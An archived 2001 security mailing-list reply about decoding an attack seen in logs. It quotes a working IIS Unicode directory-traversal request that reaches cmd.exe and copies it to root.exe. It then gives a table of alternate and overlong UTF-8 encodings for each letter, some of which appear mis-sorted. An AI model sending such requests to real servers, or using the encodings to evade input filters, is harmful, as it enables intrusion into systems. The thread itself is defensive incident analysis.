Re: Unicode Decode

From: Roelof (roelofat_private)
Date: Tue Jun 26 2001 - 00:08:47 PDT

Next message: Justin Kremer - CEO: "Re: Threat mail from russia (followup)"

Previous message: rottzat_private: "Re: any incident IRC?"
In reply to: jason: "Unicode Decode"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, 25 Jun 2001, jason wrote:

> Does anyone know of any sites/tools/tables to decode unicode
> information?  Specificly I am looking to decode the unicode portion
> of this attack:

> GET
> /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/sytem32/cmd.exe
> ?/c+copy+\winnt\system32\cmd.exe +root.exe HTTP/1.0

Jason,

I dont have all the codes (not for the
!@#$%^*&*(()+_{};'./\,. etc...havent actually got the time to brute it) -
here is the lowercase (it might help some of others on this list). This
straight from pudding: (if you are sitting on the codes for the other
chars - pass them on). Writing a decoder from this is easy.

--utf8.db-------
a-%41,%61,%c4%80,%c4%81,%c4%82,%c4%83,%c4%84,%c4%85,%c7%8d,%c7%8e,%c7%9e,%c7%9f,%ce%b1,%d
1%81,%d1%a1,%d4%80,%d4%81,%d4%82,%d4%83,%d4%84,%d4%85,%d7%8d,%d7%8e,%d7%9e,%d7%9f,%de%b1,
%42

b-%62,%c6%80,%d1%82,%d1%a2,%d6%80

c-%43,%63,%c4%86,%c4%87,%c4%88,%c4%89,%c4%8a,%c4%8b,%c4%8c,%c4%8d,%d1%83,%d1%a3,%d4%86,%d
4%87,%d4%88,%d4%89,%d4%8a,%d4%8b,%d4%8c,%d4%8d,%e2%84%82,%44

d-%64,%c4%8e,%c4%8f,%c4%91,%ce%b4,%d1%84,%d1%a4,%d4%8e,%d4%8f,%d4%91,%de%b4,%45

e-%65,%c4%92,%c4%93,%c4%94,%c4%95,%c4%96,%c4%97,%c4%98,%c4%99,%c4%9a,%c4%9b,%ce%b5,%d1%85
,%d1%a5,%d4%92,%d4%93,%d4%94,%d4%95,%d4%96,%d4%97,%d4%98,%d4%99,%d4%9a,%d4%9b,%de%b5,%e2%
84%87

f-%46,%66,%ce%a6,%cf%86,%d1%86,%d1%a6,%de%a6,%df%86

g-%47,%67,%c4%9c,%c4%9d,%c4%9e,%c4%9f,%c4%a0,%c4%a1,%c4%a2,%c4%a3,%c7%a4,%c7%a5,%c7%a6,%c
7%a7,%c9%a1,%ce%93,%d1%87,%d1%a7,%d4%9c,%d4%9d,%d4%9e,%d4%9f,%d4%a0,%d4%a1,%d4%a2,%d4%a3,
%d7%a4,%d7%a5,%d7%a6,%d7%a7,%d9%a1,%de%93,%e2%84%8a

h-%48,%68,%c4%a4,%c4%a5,%c4%a6,%c4%a7,%d1%88,%d1%a8,%d4%a4,%d4%a5,%d4%a6,%d4%a7,%e2%84%8b
,%e2%84%8c,%e2%84%8d,%e2%84%8e,%49

i-%69,%c4%a8,%c4%a9,%c4%aa,%c4%ab,%c4%ac,%c4%ad,%c4%ae,%c4%af,%c4%b0,%c4%b1,%c6%97,%c7%8f
,%c7%90,%d1%89,%d1%a9,%d4%a8,%d4%a9,%d4%aa,%d4%ab,%d4%ac,%d4%ad,%d4%ae,%d4%af,%d4%b0,%d4%
b1,%d6%97,%d7%8f,%d7%90,%e2%84%90,%e2%84%91

j-%4a,%6a,%c4%b4,%c4%b5,%c7%b0,%d1%8a,%d1%aa,%d4%b4,%d4%b5,%d7%b0

k-%4b,%6b,%c4%b6,%c4%b7,%c7%a8,%c7%a9,%d1%8b,%d1%ab,%d4%b6,%d4%b7,%d7%a8,%d7%a9

l-%4c,%6c,%c4%b9,%c4%ba,%c4%bb,%c4%bc,%c4%bd,%c4%be,%c5%81,%c5%82,%c6%9a,%d1%8c,%d1%ac,%d
4%b9,%d4%ba,%d4%bb,%d4%bc,%d4%bd,%d4%be,%d5%81,%d5%82,%d6%9a,%e2%84%92,%e2%84%93

m-%4d,%6d,%d1%8d,%d1%ad

n-%4e,%6e,%c5%83,%c5%84,%c5%85,%c5%86,%c5%87,%c5%88,%d1%8e,%d1%ae,%d5%83,%d5%84,%d5%85,%d
5%86,%d5%87,%d5%88,%e2%81%bf,%e2%84%95

o-%4f,%6f,%c5%8c,%c5%8d,%c5%8e,%c5%8f,%c5%90,%c5%91,%c6%9f,%c6%a0,%c6%a1,%c7%91,%c7%92,%c
7%aa,%c7%ab,%c7%ac,%c7%ad,%ce%a9,%d1%8f,%d1%af,%d5%8c,%d5%8d,%d5%8e,%d5%8f,%d5%90,%d5%91,
%d6%9f,%d6%a0,%d6%a1,%d7%91,%d7%92,%d7%aa,%d7%ab,%d7%ac,%d7%ad,%de%a9

p-%50,%70,%cf%80,%d1%90,%d1%b0,%df%80,%e2%82%a7,%e2%84%98,%e2%84%99

q-%51,%71,%d1%91,%d1%b1,%e2%84%9a,%52

r-%72,%c5%94,%c5%95,%c5%96,%c5%97,%c5%98,%c5%99,%d1%92,%d1%b2,%d5%94,%d5%95,%d5%96,%d5%97
,%d5%98,%d5%99,%e2%84%9b,%e2%84%9c,%e2%84%9d,%53

s-%73,%c5%9a,%c5%9b,%c5%9c,%c5%9d,%c5%9e,%c5%9f,%ce%a3,%cf%83,%d1%93,%d1%b3,%d5%9a,%d5%9b
,%d5%9c,%d5%9d,%d5%9e,%d5%9f,%de%a3,%df%83

t-%54,%74,%c5%a2,%c5%a3,%c5%a4,%c5%a5,%c5%a6,%c5%a7,%c6%ab,%c6%ae,%ce%98,%cf%84,%d1%94,%d
1%b4,%d5%a2,%d5%a3,%d5%a4,%d5%a5,%d5%a6,%d5%a7,%d6%ab,%d6%ae,%de%98,%df%84

u-%55,%75,%c5%a8,%c5%a9,%c5%aa,%c5%ab,%c5%ac,%c5%ad,%c5%ae,%c5%af,%c5%b0,%c5%b1,%c5%b2,%c
5%b3,%c6%af,%c6%b0,%c7%93,%c7%94,%c7%95,%c7%96,%c7%97,%c7%98,%c7%99,%c7%9a,%c7%9b,%c7%9c,
%d1%95,%d1%b5,%d5%a8,%d5%a9,%d5%aa,%d5%ab,%d5%ac,%d5%ad,%d5%ae,%d5%af,%d5%b0,%d5%b1,%d5%b
2,%d5%b3,%d6%af,%d6%b0,%d7%93,%d7%94,%d7%95,%d7%96,%d7%97,%d7%98,%d7%99,%d7%9a,%d7%9b,%d7
%9c,%56

v-%76,%d1%96,%d1%b6

w-%57,%77,%c5%b4,%c5%b5,%d1%97,%d1%b7,%d5%b4,%d5%b5

x-%58,%78,%d1%98,%d1%b8

y-%59,%79,%c5%b6,%c5%b7,%d1%99,%d1%b9,%d5%b6,%d5%b7

z-%5a,%7a,%c5%b9,%c5%ba,%c5%bb,%c5%bc,%c6%b6,%d1%9a,%d1%ba,%d5%b9,%d5%ba,%d5%bb,%d5%bc,%d
6%b6,%e2%84%a4,%e2%84%a8,



----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

Next message: Justin Kremer - CEO: "Re: Threat mail from russia (followup)"
Previous message: rottzat_private: "Re: any incident IRC?"
In reply to: jason: "Unicode Decode"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jun 27 2001 - 17:35:56 PDT